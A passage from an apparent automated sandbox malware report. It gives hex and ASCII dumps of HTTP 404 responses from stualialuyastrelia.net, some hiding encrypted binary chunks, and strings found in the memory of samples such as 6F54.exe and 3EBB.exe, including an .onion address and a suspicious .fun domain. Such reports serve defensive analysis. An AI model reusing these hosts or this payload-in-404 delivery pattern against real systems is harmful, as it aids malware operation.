8d 9a ae 46 c7 84 c1 33 df 7a 0d 80 49 19 e0 2c 95 a9 58 a9 f5 96 be 35 51 61 9a d4 3e 3c 89 28 c8 48 6b b1 c0 4a 9a 01 fd ec 9b aa 79 ac 87 2f bd 61 08 c0 5f bf 46 34 fd f8 12 8c 39 6c 29 78 0a 8d cb c4 6c 0e a6 eb 1e b0 6b 04 eb 1a 68 9b 4a d8 19 be cc 4f 3b 79 82 ae 9c 97 12 4c 75 56 ad f3 57 2b 2a b9 72 ee cc 23 b2 75 0e 31 69 92 90 f7 df f5 ec e7 72 2b 4c 80 04 ae fa 13 1b 11 bb d6 af 11 39 27 18 c0 b2 9f 33 29 c8 46 79 68 15 ac af eb d9 55 3d af ba 68 92 de f5 9d 27 78 55 40 d7 f0 78 39 7a e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b c1 f8 dc 8e c2 00 e8 e4 1f 5e a1 90 4e a1 54 55 a5 2e b5 1b 77 c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f d4 5c 68 91 b2 5d 63 89 58 5e ae 03 6b 6d 1d e4 a6 6d 10 9f 10 33 db b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b c1 62 7a b7 b2 fa a7 81 5f c8 b4 bb df 50 16 28 d2 0e 44 1f d0 8d ab 7a 8f 78 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 af 86 63 5e dc e5 7e b5 a5 71 d4 03 3b af 98 76 60 0f ca 82 75 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 25 67 03 6c 5b 1d f8 e0 8a ae 88 c1 24 a5 33 25 5f da a9 c3 20 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 4c da fd cd a1 59 97 52 e5 c0 ea 9e 13 f8 bd 4c 45 e3 f0 73 8d a9 da ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 02 03 81 d6 51 aa 5d 55 fe df 3c 42 9a c9 db 9e 73 2f b3 65 a2 8f 1a 78 60 d4 33 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 90 e9 f3 72 6c b0 5c 7a 7d 24 0b e9 4f 17 8d e3 51 f0 b8 3d db 18 54 5a 17 8a 55 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 2e f1 fd 1a b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 a5 28 28 8c bc b7 3e e5 10 e7 c5 29 cc 74 19 ea 57 e6 ab cb 3f 4a f4 e3 c4 52 30 68 e7 84 1f 2a f5 89 dc 5c 01 ac 7b 5d 74 54 cf 25 69 86 7d e7 32 91 94 66 6d d5 11 31 19 4c c2 c4 ed 0d f7 5a 22 97 ee bf f6 45 61 4c 36 f8 37 33 c7 e6 35 c9 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 95 e1 9c fb 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5c db c4 85 13 13 bf 9c e9 92 24 08 4f c5 78 e0 cb a1 61 6e de f5 69 09 19 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a a4 37 7c 88 2c c8 48 6b a1 c0 4a 99 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 bd ed 0e e0 eb 7e 71 d7 45 f5 1a 40 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 d4 7b 39 66 e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 09 ac fd 82 01 e8 e4 25 7b a1 90 4e b1 54 55 a5 a8 b7 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 69 e0 67 a0 5c 68 91 08 48 06 f1 2c 1e ae 03 5b 87 1f e4 a6 57 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 59 50 6d 23 e2 cb ef ea 95 03 7a d7 64 92 c3 e0 2b 19 b4 bb 01 66 17 28 d2 22 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 44 94 26 29 c4 3a 96 b1 ae ef 17 3f 0c e5 7e 4d fa 78 d4 03 43 ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 ce b8 95 0e 6b 43 43 9c 65 03 62 18 7a 14 f8 51 8d ae 88 c1 c0 a8 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ec 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e1 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f5 94 1e 56 ec 0b 08 3f 40 5b f3 f3 9c c8 2f 30 3e ce 61 11 32 f6 c2 39 8a bc 92 b2 f4 38 29 f0 0e f9 88 86 02 10 4d 87 c2 90 7a ff 35 3a 4b 3d f9 c6 68 bc 4c 69 27 eb 26 66 bf 1e db b1 c1 80 1d bd 85 65 e2 f9 57 96 ac 59 85 98 df 5a 03 13 9c 97 c0 72 26 2d 42 89 ce 1e 7a fc 0f 2e 11 99 23 6d 8d f8 0f 30 d1 c3 71 d7 21 7d bd 08 49 90 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 2e 00 f7 ff 34 8c 53 db e0 b4 3a 54 bf 1e e1 92 24 08 4f c5 e3 a1 c9 80 6a 7f db fe 69 89 19 17 7e 89 83 9a a5 02 dd a0 51 ac dd 7a 0d 80 4e 19 e0 6c 95 a9 18 1a f5 86 be 35 51 61 9a c4 3e 7c 8d 28 c8 48 6b a1 c0 4a 9f 03 fd ec 9e aa 7b ac 87 bf 9e 61 0d d0 5d bf 46 34 fd f8 10 6c 32 2c 29 7c 1a 8d c7 ed e4 0e a4 eb 6e 71 eb 90 f5 1a 68 9b 4a d8 09 ae cc 4f 13 79 82 ae 9f 97 02 4c 71 0a a5 f3 e3 3b 2a b9 72 1e ee 23 22 76 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 98 d6 5b 5e 3c 27 55 29 b7 9f 2f c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 ca 64 b1 65 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 41 b7 ae 51 46 28 e7 5b 8e 7d ab 1e 26 6d 11 ee c3 fe 57 a3 4c 0d 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 62 e5 1f 84 88 0f 74 fe 64 d8 d9 b0 7a 18 91 8a cd a4 7f 74 79 70 65 43 cc f9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 41 7a 17 68 fc ca 27 6b b1 a1 aa 7a 6b 51 69 e3 cd b0 d1 37 00 20 e1 1c c9 40 fd 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 0d a6 70 14 2d 88 c3 fc 13 6e 0f ca b8 1c 32 2e 9f 86 c5 ec 35 78 d4 a7 0d a8 c1 d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 00 aa ae 48 ef b6 d2 41 46 7d da a9 53 eb c8 2f cb 12 2b e8 8b 33 1e ac 18 58 55 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 bd c1 ea de 3d 9a dd 20 2a 82 f0 73 b1 c7 d9 ed 07 b2 71 dc 1a 0e 8b 18 57 d1 23 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 16 60 de dc 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 65 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1b 81 01 c7 5b cb f7 07 a6 3b bf 29 46 16 31 e4 76 4b 6d 82 5c 2c 13 37 c1 a5 94 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eUys/~(`:[;)F1vKm\,70
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 39 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 19 c1 5d de fa 09 b4 20 fd 26 4c 17 34 ff 6b 4b 36 d4 00 2a 5f 2e d3 af 87 ed 8d 73 95 64 7e 0b 69 e3 b4 e8 fa 58 6e 96 77 7b b8 da 85 39 bf 06 26 fb 43 9d 0d 0a 30 0d 0a 0d 0a Data Ascii: 49Uys/~(u:R] &L4kK6*_.sd~iXnw{9&C0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 03:57:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 87 14 d0 59 9c fe 09 b7 3a e5 3f 57 5b 38 be 65 0b 69 c3 57 3b 0f 7c c3 e2 90 a9 d6 71 8a 63 32 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35Uys/~(`:Y:?W[8eiW;\|qc2]0

Source: 6F54.exe, 00000021.00000002.2594000287.000000000C1E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionC:
Source: 3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aia.startssl.com/certs/ca.crt0
Source: 3EBB.exe, 00000007.00000003.2361859748.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2360058865.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aia.startssl.com/certs/sca.code3.crt06
Source: 6F54.exe	String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: 4294.exe, 00000008.00000002.2397262813.000000000077D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bombertublestylebanws.fun/
Source: 3EBB.exe, 00000007.00000003.2355444891.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2357874414.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356349485.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2358545994.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2359461162.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2362618248.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355663407.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356491235.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356234188.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355558887.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435AD7000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 